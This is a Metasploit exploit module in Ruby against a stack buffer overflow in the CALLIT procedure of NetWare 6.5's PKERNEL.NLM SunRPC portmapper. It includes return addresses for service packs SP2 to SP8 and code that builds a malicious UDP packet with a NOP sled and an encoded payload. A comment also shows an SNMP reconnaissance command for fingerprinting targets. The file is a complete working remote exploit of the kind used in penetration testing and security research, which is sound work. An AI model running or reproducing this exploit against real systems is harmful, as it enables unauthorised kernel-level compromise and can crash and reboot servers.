##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  # Registers the module metadata: name, description, references,
  # payload space limit, platform and one target per NetWare 6.5 service
  # pack. The targets differ only in their 'Ret' address; the 'Notes'
  # block records that a failed attempt can restart the target OS and
  # that the attempt leaves traces in logs.
  #
  # @param info [Hash] module info hash merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
          PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
          The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
          cause the operating system to reboot.
        },
        'Author' => [ 'pahtzo', ],
        'License' => MSF_LICENSE,
        'References' => [
          # There is no CVE for this vulnerability
          [ 'BID', '36564' ],
          [ 'OSVDB', '58447' ],
          [ 'ZDI', '09-067' ],
        ],
        'Privileged' => true,
        'Payload' => {
          # Upper bound on payload.encoded length appended in #exploit.
          'Space' => 2020
        },
        'Platform' => 'netware',
        'Targets' => [
          # NetWare SP and PKERNEL.NLM version can be found in SNMP:
          # snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm"
          # sysDescr.0 = STRING: Novell NetWare 5.70.08 October 3, 2008
          # hrSWRunName.1191394992 = STRING: "PKERNEL.NLM v15.01 (20081014)"
          [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)
        ],
        'Notes' => {
          'Stability' => [ CRASH_OS_RESTARTS ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ UNRELIABLE_SESSION ]
        },
        'DisclosureDate' => '2009-09-30'
      )
    )

    # Only the remote port is configurable; 111 is the portmapper default.
    register_options([Opt::RPORT(111)])
  end

  # Builds a single SunRPC CALLIT request and sends it over UDP.
  #
  # Packet layout, in order of appending: RPC call header (XID, message
  # type, RPC version, program, version, procedure, null credentials and
  # verifier), the nested program/version/procedure forwarded by CALLIT,
  # a declared argument length, a NOP sled, the target's return address
  # and finally the encoded payload. Every RPC/XDR field is packed as a
  # big-endian 32-bit integer ('N'); the return address alone is packed
  # little-endian ('V'). The declared argument length is the constant
  # 4097 and is not computed from the bytes appended after it.
  #
  # The socket is opened with connect_udp and released with disconnect_udp
  # after the payload handler has been invoked; there is no ensure, so an
  # exception between the two leaves the socket to the framework's cleanup.
  #
  # @return [void]
  def exploit
    connect_udp

    buf = [rand(0xffffffff)].pack('N') # XID
    buf << [0].pack('N') # Message Type: Call (0)
    buf << [2].pack('N') # RPC Version: 2
    buf << [100000].pack('N') # Program: Portmap (100000)
    buf << [2].pack('N') # Program Version: 2
    buf << [5].pack('N') # Procedure: CALLIT (5)
    buf << [0].pack('N') # Credentials AUTH_NULL (0)
    buf << [0].pack('N') # Length: 0
    buf << [0].pack('N') # Verifier AUTH_NULL (0)
    buf << [0].pack('N') # Length: 0
    buf << [0].pack('N') # Program: Unknown (0)
    buf << [1].pack('N') # Version: 1
    buf << [1].pack('N') # Procedure: proc-1 (1)
    buf << [4097].pack('N') # Arguments: <DATA> length: 4097

    buf << make_nops(2072) # fill to ret
    buf << [target.ret].pack('V') # addr. of push esp - ret (little-endian, unlike the XDR fields)
    buf << payload.encoded # bounded by 'Payload' => { 'Space' => 2020 }

    # print_status("payload space #{payload_space()}...")
    # print_status("payload len #{payload.encoded.length}...")
    # print_status("total buf len #{buf.length}...")

    print_status("Trying target #{target.name}...")

    # Single datagram; no reply is read, so success is only observable
    # through the handler.
    udp_sock.put(buf)
    handler
    disconnect_udp
  end
end